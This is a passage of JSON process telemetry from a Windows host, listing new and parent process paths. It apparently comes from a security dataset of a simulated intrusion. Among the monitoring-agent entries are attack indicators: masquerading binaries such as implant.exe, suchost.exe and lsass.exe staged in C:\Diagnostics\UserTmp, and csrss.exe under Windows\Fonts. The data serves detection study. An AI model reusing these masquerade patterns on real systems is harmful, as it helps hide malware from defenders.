State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\taskhostw.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\222\\\\pmfexe.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\"],\"ParentProcessName\":[\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\Dism.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\Dism.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\regsvr32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\suchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\certutil.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\vssadmin.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\wuauclt.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\lsass.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\Fonts\\\\csrss.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service 